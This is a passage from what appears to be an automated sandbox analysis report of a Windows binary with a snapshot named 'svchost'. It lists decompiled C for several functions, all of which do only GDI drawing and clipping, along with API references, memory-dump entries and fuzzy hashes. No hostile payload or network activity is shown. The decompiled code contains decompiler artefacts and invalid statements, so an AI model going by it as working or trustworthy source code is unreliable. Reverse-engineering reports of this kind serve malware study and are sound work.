							_t180 = 0;
						}
						 *((intOrPtr*)(_t158 + 0xec)) = E00425870(_t200, _t180, _t126);
					}
					 *(_t203 + 0x64) = _t190;
					 *(_t203 + 0x60) = _t190;
					 *(_t203 + 0x70) = _t190;
					 *(_t203 + 0x74) = _t190;
					 *(_t203 + 0x68) = _t190;
					 *(_t203 + 0x6c) = _t190;
					if( *((intOrPtr*)(_t158 + 0xec)) != _t190) {
						_t139 = E0040C100( *((intOrPtr*)(_t158 + 0x48)));
						_t203 = _t203 + 4;
						if(E00425950(_t215,  *(_t203 + 0x8c),  *((intOrPtr*)(_t158 + 0xec)), _t203 + 0x60, _t139) == 1) {
							GetClientRect( *(_t158 + 0x1c), _t203 + 0x40);
							_t186 =  *(_t158 + 0x60);
							 *(_t203 + 0x8c) =  *((intOrPtr*)(_t203 + 0x48)) -  *(_t203 + 0x40);
							 *((intOrPtr*)(_t203 + 0x10)) =  *((intOrPtr*)(_t203 + 0x4c)) -  *((intOrPtr*)(_t203 + 0x44));
							if(_t186 > 3) {
								L30:
								_t190 = 0;
							} else {
								switch( *((intOrPtr*)(_t186 * 4 +  &M0041C7E4))) {
									case 0:
										_t190 = 0;
										E00425D90(_t172, _t203 + 0x70, 0, 0, 0xffffffff, 0xffffffff, 0xcc0020);
										 *(_t203 + 0x2c) = 0;
										 *(_t203 + 0x28) = 0x49637c;
										 *((char*)(_t203 + 0x90)) = 1;
										E00489EBE(_t203 + 0x2c, CreateRectRgn(0, 0,  *(_t203 + 0x68),  *(_t203 + 0x6c)));
										_t44 = _t203 + 0x28; // 0x49637c
										asm("sbb eax, eax");
										asm("sbb ecx, ecx");
										CombineRgn( *(_t203 + 0x3c),  ~(_t203 + 0x38) &  *(_t203 + 0x3c),  ~_t44 &  *(_t203 + 0x2c), 4);
										 *(_t203 + 0x28) = 0x496388;
										 *((char*)(_t203 + 0x80)) = 2;
										E00489F15(_t203 + 0x28);
										 *((char*)(_t203 + 0x80)) = 0;
										goto L31;
									case 1:
										__edi = 0;
										if(__ecx > 0) {
											__ebx =  *0x49247c;
											__ecx =  *(__esp + 0x68);
											do {
												__edi = 0;
												if(__eax > 0) {
													do {
														__eax =  *(__esp + 0x6c);
														__ecx = __ecx + __edi;
														__eax =  *(__esp + 0x6c) + __esi;
														__ecx = __esp + 0x5c;
														__eax = SetRect(__esp + 0x5c, __edi, __esi, __esp + 0x5c,  *(__esp + 0x6c) + __esi);
														__edx = __esp + 0x50;
														__esp + 0x2c = IntersectRect(__esp + 0x2c, __esp + 0x50, __ebp);
														__edx =  *(__esp + 0x2c);
														__ecx =  *(__esp + 0x28);
														__eax =  *(__esp + 0x30);
														 *(__esp + 0x1c) =  *(__esp + 0x2c);
														 *(__esp + 0x18) =  *(__esp + 0x28);
														__ecx =  *(__esp + 0x34);
														__edx = __esp + 0x18;
														 *(__esp + 0x20) =  *(__esp + 0x30);
														 *(__esp + 0x28) = __ecx;
														if(IsRectEmpty(__esp + 0x18) == 0) {
															__esp + 0x70 = E00425D90(__ecx, __esp + 0x70, __edi, __esi, 0xffffffff, 0xffffffff, 0xcc0020);
														}
														__ecx =  *(__esp + 0x68);
														__eax =  *(__esp + 0x8c);
														__edi = __ecx + __edi;
													} while (__edi < __eax);
												}
												__edi =  *(__esp + 0x6c);
												__edx =  *(__esp + 0x10);
												__esi = __esi +  *(__esp + 0x6c);
											} while (__esi <  *(__esp + 0x10));
											__ebx =  *(__esp + 0x14);
											__edi = 0;
										}
										__ecx = __esp + 0x38;
										__eax = E00489F15(__ecx);
										goto L31;
									case 2:
										__ecx =  *(__ebx + 0xec);
										__ebp =  *(__ecx + 4);
										 *(__esp + 0x18) = __ebp;
										__ebx =  *(__ecx + 8);
										 *(__esp + 0x28) = __ebx;
										if(__ebp <= __eax) {
											__eax = __eax - __ebp;
											 *(__esp + 0x8c) = __ebp;
											asm("cdq");
											__edi = __eax;
											__eax = __ebp;
											__edi = __edi >> 1;
										}
										__ecx =  *(__esp + 0x10);
										if(__ebx <= __ecx) {
											__eax = __ecx;
											 *(__esp + 0x10) = __ebx;
											__eax = __ecx - __ebx;
											asm("cdq");
											__eax = __ecx - __ebx - __edx;
											__esi = __ecx - __ebx - __edx;
											__eax =  *(__esp + 0x8c);
											__esi = __ecx - __ebx - __edx >> 1;
										}
										if(__ebp > __eax || __ebx >  *(__esp + 0x10)) {
											asm("fild dword [esp+0x18]");
											asm("fild dword [esp+0x8c]");
											__fp0 = __fp0 / st1;
											asm("fild dword [esp+0x28]");
											asm("fst qword [esp+0x18]");
											asm("fild dword [esp+0x10]");
											__fp0 = __fp0 / st1;
											 *(__esp + 0x28) = __fp0;
											st0 = __fp0;
											asm("fcom qword [esp+0x28]");
											asm("fnstsw ax");
											if((__ah & 0x00000001) == 0) {
												st0 = __fp0;
												__fp0 =  *(__esp + 0x28);
											}
											asm("fxch st0, st1");
											__fp0 = __fp0 * st1;
											__eax = E00470388();
											__fp0 =  *(__esp + 0x18);
											__fp0 =  *(__esp + 0x18) * st1;
											__ebp = __eax;
											__ebx = E00470388();
											 *(__esp + 0x8c) =  *(__esp + 0x8c) - __ebp;
											asm("cdq");
											st0 = __fp0;
											 *(__esp + 0x8c) - __ebp - __edx =  *(__esp + 0x8c) - __ebp - __edx >> 1;
											__edi = __edi + ( *(__esp + 0x8c) - __ebp - __edx >> 1);
											 *(__esp + 0x10) =  *(__esp + 0x10) - __ebx;
											asm("cdq");
											 *(__esp + 0x10) - __ebx - __edx =  *(__esp + 0x10) - __ebx - __edx >> 1;
											__esi = __esi + ( *(__esp + 0x10) - __ebx - __edx >> 1);
										}
										__ecx = __esp + 0x70;
										__eax = E00425D90(__esp + 0x70, __esp + 0x70, __edi, __esi, __ebp, __ebx, 0xcc0020);
										 *(__esp + 0x2c) = 0;
										 *(__esp + 0x28) = 0x49637c;
										__ebx = __ebx + __esi;
										__ebp = __ebp + __edi;
										 *((char*)(__esp + 0x90)) = 3;
										__eax = CreateRectRgn(__edi, __esi, __ebp, __ebx);
										__ecx = __esp + 0x2c;
										__eax = E00489EBE(__esp + 0x2c, __eax);
										__esi =  *(__esp + 0x2c);
										_t95 = __esp + 0x28; // 0x49637c
										__eax = _t95;
										__edx =  *(__esp + 0x3c);
										__ecx = __esp + 0x38;
										__eax =  ~_t95;
										asm("sbb eax, eax");
										__eax =  ~_t95 & __esi;
										__ecx =  ~(__esp + 0x38);
										asm("sbb ecx, ecx");
										__ecx =  ~(__esp + 0x38) & __edx;
										__eax = CombineRgn(__edx,  ~(__esp + 0x38) & __edx,  ~_t95 & __esi, 4);
										 *(__esp + 0x28) = 0x496388;
										__ecx = __esp + 0x28;
										 *((char*)(__esp + 0x80)) = 4;
										__eax = E00489F15(__ecx);
										__ebx =  *(__esp + 0x14);
										 *((char*)(__esp + 0x80)) = 0;
										goto L30;
									case 3:
										__edi = 0;
										__edx = __esp + 0x70;
										__eax = E00425D90(__ecx, __esp + 0x70, 0, 0, __eax, __ecx, 0xcc0020);
										__ecx = __esp + 0x38;
										__eax = E00489F15(__ecx);
										goto L31;
								}
							}
							L31:
							E004260F0(_t203 + 0x60);
						}
					}
				}
				_t104 = _t203 + 0x38; // 0x49637c
				if(_t104 != 0 &&  *(_t203 + 0x3c) != _t190) {
					_t129 = E0040C100( *((intOrPtr*)(_t158 + 0x48)));
					_t203 = _t203 + 4;
					_push(_t129);
					_t130 = E00489F7B(_t203 + 0x28);
					if(_t130 != _t190) {
						_t190 =  *(_t130 + 4);
					}
					asm("sbb eax, eax");
					FillRgn( *( *((intOrPtr*)(_t203 + 0x90)) + 4),  ~(_t203 + 0x38) &  *(_t203 + 0x3c), _t190);
					 *(_t203 + 0x28) = 0x496388;
					 *((char*)(_t203 + 0x80)) = 5;
					E00489F15(_t203 + 0x28);
				}
				 *(_t203 + 0x38) = 0x496388;
				 *((intOrPtr*)(_t203 + 0x80)) = 6;
				E00489F15(_t203 + 0x38);
				 *[fs:0x0] =  *((intOrPtr*)(_t203 + 0x78));
				return 0x1335437;
			}















    0x0041c360
    0x0041c360
    0x0041c362
    0x0041c36d
    0x0041c36e
    0x0041c375
    0x0041c37c
    0x0041c37e
    0x0041c380
    0x0041c384
    0x0041c388
    0x0041c390
    0x0041c397
    0x0041c3b9
    0x0041c3be
    0x0041c3c3
    0x0041c3cf
    0x0041c3d5
    0x0041c3db
    0x0041c3d7
    0x0041c3d7
    0x0041c3d7
    0x0041c3e5
    0x0041c3e5
    0x0041c3f1
    0x0041c3f7
    0x0041c3fb
    0x0041c3ff
    0x0041c403
    0x0041c407
    0x0041c40b
    0x0041c415
    0x0041c420
    0x0041c43a
    0x0041c449
    0x0041c461
    0x0041c46b
    0x0041c472
    0x0041c476
    0x0041c71a
    0x0041c71a
    0x0041c47c
    0x0041c47c
    0x00000000
    0x0041c48a
    0x0041c495
    0x0041c49a
    0x0041c49e
    0x0041c4b2
    0x0041c4c5
    0x0041c4ce
    0x0041c4dc
    0x0041c4e4
    0x0041c4eb
    0x0041c4f1
    0x0041c4fd
    0x0041c505
    0x0041c50a
    0x00000000
    0x00000000
    0x0041c517
    0x0041c51b
    0x0041c521
    0x0041c527
    0x0041c52b
    0x0041c52b
    0x0041c52f
    0x0041c531
    0x0041c531
    0x0041c535
    0x0041c537
    0x0041c53c
    0x0041c542
    0x0041c544
    0x0041c54f
    0x0041c555
    0x0041c559
    0x0041c55d
    0x0041c561
    0x0041c565
    0x0041c569
    0x0041c56d
    0x0041c571
    0x0041c576
    0x0041c582
    0x0041c594
    0x0041c594
    0x0041c599
    0x0041c59d
    0x0041c5a4
    0x0041c5a6
    0x0041c531
    0x0041c5aa
    0x0041c5ae
    0x0041c5b2
    0x0041c5b4
    0x0041c5bc
    0x0041c5c0
    0x0041c5c0
    0x0041c5c2
    0x0041c5c6
    0x00000000
    0x00000000
    0x0041c5d0
    0x0041c5d6
    0x0041c5d9
    0x0041c5dd
    0x0041c5e2
    0x0041c5e6
    0x0041c5e8
    0x0041c5ea
    0x0041c5f1
    0x0041c5f4
    0x0041c5f6
    0x0041c5f8
    0x0041c5f8
    0x0041c5fa
    0x0041c600
    0x0041c602
    0x0041c604
    0x0041c608
    0x0041c60a
    0x0041c60b
    0x0041c60d
    0x0041c60f
    0x0041c616
    0x0041c616
    0x0041c61a
    0x0041c622
    0x0041c626
    0x0041c62d
    0x0041c62f
    0x0041c633
    0x0041c637
    0x0041c63b
    0x0041c63d
    0x0041c641
    0x0041c643
    0x0041c647
    0x0041c64c
    0x0041c64e
    0x0041c650
    0x0041c650
    0x0041c654
    0x0041c656
    0x0041c658
    0x0041c65d
    0x0041c661
    0x0041c663
    0x0041c66a
    0x0041c673
    0x0041c675
    0x0041c676
    0x0041c67a
    0x0041c67c
    0x0041c682
    0x0041c684
    0x0041c687
    0x0041c689
    0x0041c689
    0x0041c693
    0x0041c699
    0x0041c69e
    0x0041c6a6
    0x0041c6ae
    0x0041c6b0
    0x0041c6b6
    0x0041c6be
    0x0041c6c5
    0x0041c6c9
    0x0041c6ce
    0x0041c6d2
    0x0041c6d2
    0x0041c6d6
    0x0041c6da
    0x0041c6de
    0x0041c6e0
    0x0041c6e4
    0x0041c6e6
    0x0041c6e8
    0x0041c6eb
    0x0041c6ef
    0x0041c6f5
    0x0041c6fd
    0x0041c701
    0x0041c709
    0x0041c70e
    0x0041c712
    0x00000000
    0x00000000
    0x0041c7c7
    0x0041c7cb
    0x0041c7d1
    0x0041c7d6
    0x0041c7da
    0x00000000
    0x00000000
    0x0041c47c
    0x0041c71c
    0x0041c721
    0x0041c721
    0x0041c43a
    0x0041c40b
    0x0041c726
    0x0041c72c
    0x0041c738
    0x0041c73d
    0x0041c744
    0x0041c745
    0x0041c74c
    0x0041c74e
    0x0041c74e
    0x0041c75b
    0x0041c76c
    0x0041c772
    0x0041c77e
    0x0041c786
    0x0041c786
    0x0041c78b
    0x0041c797
    0x0041c7a2
    0x0041c7b4
    0x0041c7be

    APIs
    • CreateRectRgn.GDI32(?,?,?,?), ref: 0041C3AE
    • GetClientRect.USER32(?,?), ref: 0041C449
    • CreateRectRgn.GDI32 ref: 0041C4BA
    • CombineRgn.GDI32(?,?,|cI,00000004), ref: 0041C4EB
    • SetRect.USER32(?,00000000,?,?,?), ref: 0041C542
    • IntersectRect.USER32(?,?,?), ref: 0041C54F
    • IsRectEmpty.USER32(?), ref: 0041C57A
    • __ftol.LIBCMT ref: 0041C658
    • __ftol.LIBCMT ref: 0041C665
    • CreateRectRgn.GDI32(00000000,?,00000000,00000000), ref: 0041C6BE
    • CombineRgn.GDI32(?,?,|cI,00000004), ref: 0041C6EF
      • Part of subcall function 00425D90: SetStretchBltMode.GDI32(?,00000000), ref: 00425DA4
      • Part of subcall function 00425D90: CreateCompatibleDC.GDI32(?), ref: 00425E29
      • Part of subcall function 00425D90: CreateCompatibleDC.GDI32(?), ref: 00425E41
      • Part of subcall function 00425D90: GetObjectA.GDI32(?,00000018,?), ref: 00425E82
      • Part of subcall function 00425D90: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00425E98
    • FillRgn.GDI32(?,?,00000000), ref: 0041C76C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Create$CombineCompatible__ftol$BitmapClientEmptyFillIntersectModeObjectStretch
    • String ID: |cI$|cI
    • API String ID: 3212946024-1582058208
    • Opcode ID: 9f2f3babf597508a9b227a7ad56c983919b5f948e8258afc0ae4af4450ca166e
    • Instruction ID: ca48216e322a323c5e02105f273f010dd4b8f1948b5e99b5c840a1bd6257e690
    • Opcode Fuzzy Hash: 9f2f3babf597508a9b227a7ad56c983919b5f948e8258afc0ae4af4450ca166e
    • Instruction Fuzzy Hash: EFD18D71108341AFC714DF25C884AAFBBE9BBC8354F148A2EF99983251D774E845CB66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00446920 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 372COMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00446920(void* __ecx, void* __fp0) {
				int _v8;
				intOrPtr _v12;
				char _v56;
				char _v68;
				char _v96;
				char _v100;
				void* _v104;
				char _v108;
				intOrPtr _v120;
				struct tagPOINT _v128;
				signed int _v132;
				int _v136;
				struct HDC__* _v140;
				signed int _v144;
				signed int _v148;
				struct HDC__* _v164;
				char _v168;
				intOrPtr _v172;
				void* _v176;
				char _v184;
				intOrPtr _v192;
				long _v196;
				long _v200;
				struct tagRECT _v216;
				signed int _v220;
				void* _v224;
				struct tagRECT _v240;
				long _v244;
				struct tagPOINT _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				long _v260;
				intOrPtr _v264;
				long _v268;
				long _v296;
				char _v300;
				void* __ebp;
				void* _t168;
				intOrPtr _t170;
				signed int _t184;
				long _t195;
				intOrPtr _t204;
				long _t211;
				signed int _t219;
				intOrPtr _t221;
				long _t225;
				char _t236;
				int _t243;
				long _t244;
				signed int _t247;
				void* _t257;
				void* _t259;
				intOrPtr _t262;
				void* _t264;
				int _t271;
				intOrPtr _t284;
				void* _t301;
				long _t304;
				signed int _t342;
				long _t345;
				int _t359;
				intOrPtr _t368;
				void* _t370;
				void* _t372;
				void* _t375;
				intOrPtr* _t377;
				intOrPtr _t385;
				void* _t386;
				void* _t388;
				void* _t403;
				void* _t404;

				_t404 = __fp0;
				_push(0xffffffff);
				_push(E00490494);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t385;
				_t386 = _t385 - 0xc8;
				_t372 = __ecx;
				_t168 = E0042D860( *((intOrPtr*)(__ecx + 0x3c)));
				_t375 = _t168;
				_t359 = 0;
				_t389 = _t375;
				if(_t375 == 0) {
					L20:
					 *[fs:0x0] = _v12;
					return _t168;
				}
				_push(__ecx);
				E00489D7E( &_v96, _t389);
				_t170 =  *((intOrPtr*)(__ecx + 0xd0));
				_v8 = 0;
				_push(_t170);
				_push(_t170);
				E00445E70( &_v100);
				_t386 = _t386 + 0xc;
				_t259 = E0042AB80(_t375);
				_v216.left = 0;
				_t390 = _t259;
				if(_t259 <= 0) {
					L3:
					_t377 = _t372 + 0x68;
					_t271 = E0042C7C0(_t377);
					if(_t271 == 0xffffffff) {
						L6:
						_t271 = MulDiv( *(_t372 + 0xc8), 0x64, _v216.left);
						if(_t271 != 0xfffffffe) {
							L8:
							asm("cdq");
							_v132 = ( *(_t372 + 0xcc) +  *(_t372 + 0xcc) * 4 + ( *(_t372 + 0xcc) +  *(_t372 + 0xcc) * 4) * 4 << 2) / _t271;
							_v216.left = (0x51eb851f * _t271 *  *(_t372 + 0xd0) >> 0x20 >> 5) + (0x51eb851f * _t271 *  *(_t372 + 0xd0) >> 0x20 >> 5 >> 0x1f);
							_t184 = E00486411(_t372, 1);
							_v148 =  ~((E00486411(_t372, 0) << 4) - _t185) << 1;
							_v144 =  ~((_t184 << 4) - _t184) << 1;
							E00489BAD( &_v108,  &_v148);
							GetClientRect( *(_t372 + 0x1c),  &_v128);
							DPtoLP(_v104,  &_v128, 2);
							_t284 =  *((intOrPtr*)(_t372 + 0x48));
							asm("cdq");
							_t195 = _v120 - _t284 - _v128 - _v128 >> 1;
							if(_t195 < 0x32) {
								_t195 = 0x32;
							}
							_v216.bottom.x = _t284 + _t195;
							_v216.top.left = _t195;
							_v200 =  *((intOrPtr*)(_t372 + 0x4c)) + 0x32;
							_v216.right = 0x32;
							OffsetRect( &(_v216.top), _v140, _v136);
							E004894D6( &_v100, 7);
							E004894D6( &_v104, 0);
							Rectangle(_v104, _v220, _v216.left, _v216.top, _v216.right);
							_push(0);
							E00489F7B( &(_v216.right));
							_t204 = _v240.right;
							_v224 = _t204;
							_v216.left = _t204 + 0x1e;
							asm("sbb eax, eax");
							_v240.bottom.left = _v244 + 0x1e;
							_v220 = _v240.top.x + 0x1e;
							FillRect(_v128,  &(_v240.bottom),  ~( &(_v216.top)) & _v216.right);
							_t211 = _v248;
							_v240.left = _t211;
							_v240.right = _t211 + 0x1e;
							_v240.bottom.left = _v244 + 0x1e;
							_v240.top.x = _v252 + 0x1e;
							asm("sbb eax, eax");
							FillRect(_v140,  &_v240,  ~( &_v224) & _v220);
							_t219 =  *(_t372 + 0xd4);
							if(_t219 >= 0 && _t219 <=  *((intOrPtr*)(_t372 + 0xdc)) - 1) {
								_t342 = _t219 + _t219 * 2;
								_t221 =  *((intOrPtr*)(_t372 + 0xd8));
								_t301 = _t221 + _t342 * 4;
								_v176 =  *((intOrPtr*)(_t221 + _t342 * 4));
								_v172 =  *((intOrPtr*)(_t301 + 4));
								_t368 =  *((intOrPtr*)(_t301 + 8));
								_t225 =  *((intOrPtr*)(_t372 + 0x58)) +  *_t377 + _v260;
								_v244 = _v260;
								_v244 = _t225;
								_t345 = _v252 -  *((intOrPtr*)(_t372 + 0x70)) +  *((intOrPtr*)(_t372 + 0x60));
								_v240.top.x = _t345;
								_v196 = _t345;
								_v216.bottom.x = _t225;
								_t304 = _v256 +  *((intOrPtr*)(_t372 + 0x6c)) +  *((intOrPtr*)(_t372 + 0x5c));
								_v240.left = _t304;
								_t262 = _v248 -  *((intOrPtr*)(_t372 + 0x74)) +  *((intOrPtr*)(_t372 + 0x64));
								_v200 = _t304;
								_v240.right = _t262;
								_v192 = _t262;
								LPtoDP(_v140,  &(_v216.bottom), 2);
								if(IsRectEmpty( &_v216) == 0) {
									_v240.bottom.left = 0;
									_v216.right = _v216.right + 3;
									_v216.bottom.x = _v216.bottom.x + 3;
									_v240.right = 0x498754;
									_v68 = 2;
									E00489EBE( &(_v240.top), CreateRectRgnIndirect( &_v216));
									E0048993F( &_v168,  &_v240);
									_v240.top.x = _v268;
									_v240.right = _v264;
									LPtoDP(_v164,  &(_v240.top), 1);
									_t236 = _v300;
									_push(_t236);
									_push(_t236);
									E00445E70( &_v184);
									_t388 = _t386 + 0xc;
									DPtoLP(_v176,  &_v248, 1);
									_t264 = E0042D7F0( *((intOrPtr*)(_t372 + 0x3c)));
									E0042D800( *((intOrPtr*)(_t372 + 0x3c)), 1);
									if( *(_t372 + 0xd4) !=  *((intOrPtr*)(_t372 + 0xdc)) - 1 ||  *((intOrPtr*)(_t372 + 0x8c)) != 1 ||  *((intOrPtr*)(_t372 + 0xc0)) > 0) {
										_t243 = 0;
										__eflags = 0;
									} else {
										_t243 = _v216.right;
									}
									_push(_t243);
									_t244 = _v200;
									_t370 = _t368 - _t244 + 1;
									_t403 = _t370;
									_push(_t370);
									_push(_t244);
									_push(_v240.top.x);
									_push(_v240.left);
									_push( &_v176);
									E004336C0( *((intOrPtr*)(_t372 + 0x3c)), _t404);
									_t247 =  *(_t372 + 0xd0);
									_push(_t247);
									_push(_t247);
									E00445E70( &_v200);
									_t386 = _t388 + 0xc;
									E0048993F( &_v200, 0);
									_push(_v240.right);
									_push( *((intOrPtr*)(_t372 + 0x78)));
									_push( &_v300);
									_push( &(_v216.bottom));
									E004334D0();
									E0042D800( *((intOrPtr*)(_t372 + 0x3c)), _t264);
									_v296 = 0x498748;
									_v132 = 3;
									E00489F15( &_v296);
								}
							}
							_v240.bottom.left = 0x498748;
							_v56 = 4;
							E00489F15( &(_v240.bottom));
							_v56 = 0xffffffff;
							_t168 = E00489DF0( &_v148, _t403);
							goto L20;
						}
						L7:
						_t271 = 0x64;
						goto L8;
					}
					if(_t271 != 0xfffffffe) {
						goto L8;
					}
					if(_v216 <=  *(_t372 + 0xc8)) {
						goto L7;
					}
					goto L6;
				} else {
					goto L2;
				}
				do {
					L2:
					_t257 = E0042AB90(_t375, _t390, _t359);
					_t359 = _t359 + 1;
					_v220 = _v220 + _t257;
				} while (_t359 < _t259);
				goto L3;
			}










































































    0x00446920
    0x00446926
    0x00446928
    0x0044692d
    0x0044692e
    0x00446935
    0x0044693d
    0x00446943
    0x00446948
    0x0044694a
    0x0044694c
    0x0044694e
    0x00446e02
    0x00446e0c
    0x00446e19
    0x00446e19
    0x00446955
    0x0044695d
    0x00446962
    0x00446968
    0x0044696f
    0x00446970
    0x00446979
    0x0044697e
    0x00446988
    0x0044698a
    0x0044698e
    0x00446990
    0x004469a9
    0x004469a9
    0x004469b3
    0x004469b8
    0x004469cd
    0x004469e1
    0x004469e6
    0x004469ed
    0x004469fe
    0x00446a08
    0x00446a1f
    0x00446a23
    0x00446a4c
    0x00446a57
    0x00446a5b
    0x00446a69
    0x00446a7e
    0x00446a84
    0x00446a93
    0x00446a96
    0x00446a9b
    0x00446a9d
    0x00446a9d
    0x00446aa8
    0x00446ab2
    0x00446aba
    0x00446ac5
    0x00446acd
    0x00446adc
    0x00446aea
    0x00446b0b
    0x00446b11
    0x00446b17
    0x00446b1c
    0x00446b28
    0x00446b33
    0x00446b43
    0x00446b45
    0x00446b5d
    0x00446b63
    0x00446b65
    0x00446b6d
    0x00446b74
    0x00446b82
    0x00446b8c
    0x00446b94
    0x00446ba6
    0x00446ba8
    0x00446bb0
    0x00446bc5
    0x00446bc8
    0x00446bd4
    0x00446bda
    0x00446be5
    0x00446bf3
    0x00446bfa
    0x00446c02
    0x00446c0a
    0x00446c0e
    0x00446c16
    0x00446c1a
    0x00446c1e
    0x00446c29
    0x00446c37
    0x00446c3b
    0x00446c3d
    0x00446c41
    0x00446c45
    0x00446c4f
    0x00446c5e
    0x00446c71
    0x00446c7d
    0x00446c81
    0x00446c85
    0x00446c91
    0x00446ca5
    0x00446cb6
    0x00446cc3
    0x00446cd6
    0x00446cda
    0x00446cdc
    0x00446ce7
    0x00446ce8
    0x00446cea
    0x00446cf6
    0x00446d01
    0x00446d14
    0x00446d16
    0x00446d2a
    0x00446d45
    0x00446d45
    0x00446d3f
    0x00446d3f
    0x00446d3f
    0x00446d47
    0x00446d48
    0x00446d52
    0x00446d52
    0x00446d5a
    0x00446d5b
    0x00446d60
    0x00446d61
    0x00446d65
    0x00446d66
    0x00446d6b
    0x00446d71
    0x00446d72
    0x00446d7b
    0x00446d80
    0x00446d8c
    0x00446d98
    0x00446d9d
    0x00446da5
    0x00446da6
    0x00446daa
    0x00446db3
    0x00446db8
    0x00446dc4
    0x00446dcc
    0x00446dcc
    0x00446c5e
    0x00446dd1
    0x00446ddd
    0x00446de5
    0x00446df1
    0x00446dfc
    0x00000000
    0x00446e01
    0x004469e8
    0x004469e8
    0x00000000
    0x004469e8
    0x004469bd
    0x00000000
    0x00000000
    0x004469cb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00446992
    0x00446992
    0x00446995
    0x004469a0
    0x004469a3
    0x004469a3
    0x00000000

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 00445E70: GetWindowExtEx.GDI32(?,?), ref: 00445E93
    • MulDiv.KERNEL32(?,00000064,?), ref: 004469DB
    • GetClientRect.USER32(?,?), ref: 00446A69
    • DPtoLP.GDI32(?,?,00000002), ref: 00446A7E
    • OffsetRect.USER32 ref: 00446ACD
    • Rectangle.GDI32(?,?,?,?,?), ref: 00446B0B
    • FillRect.USER32(?,?,?), ref: 00446B63
    • FillRect.USER32(?,00000032,?), ref: 00446BA6
    • LPtoDP.GDI32(?,?,00000002), ref: 00446C4F
    • IsRectEmpty.USER32(?), ref: 00446C56
    • CreateRectRgnIndirect.GDI32(?), ref: 00446C9A
      • Part of subcall function 0048993F: SelectClipRgn.GDI32(?,00000000), ref: 00489961
      • Part of subcall function 0048993F: SelectClipRgn.GDI32(?,?), ref: 00489977
    • LPtoDP.GDI32(?,?,00000001), ref: 00446CDA
    • DPtoLP.GDI32(?,?,00000001), ref: 00446D01
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ClipFillSelect$BeginClientCreateEmptyH_prologIndirectOffsetPaintRectangleWindow
    • String ID: 2
    • API String ID: 2521159323-450215437
    • Opcode ID: fe276b8e35ff110e8f123be98c0e5582bb872bb1aec27581ef5c309ca41490c1
    • Instruction ID: 031c37083d8c1f3f6dac08aa35d70d85146f0fe552c25f2e010331297df93c53
    • Opcode Fuzzy Hash: fe276b8e35ff110e8f123be98c0e5582bb872bb1aec27581ef5c309ca41490c1
    • Instruction Fuzzy Hash: 0BE12BB16087409FD324DF69C881A6BB7E5BFC8704F448A2EF59A83351DB74E904CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043A6C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 185windowCOMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E0043A6C0(void* __ecx, void* __fp0, struct HDC__* _a4) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				struct tagRECT _v32;
				char _v36;
				char _v44;
				char _v52;
				void* _v56;
				char _v60;
				char _v64;
				int _v68;
				int _v72;
				int _v76;
				void* _v92;
				void* __ebp;
				int _t66;
				struct HBRUSH__* _t82;
				struct HBRUSH__* _t88;
				struct HBRUSH__* _t92;
				struct HDC__* _t97;
				int _t112;
				struct HDC__* _t133;
				void* _t135;
				intOrPtr _t141;
				void* _t149;

				_t149 = __fp0;
				_push(0xffffffff);
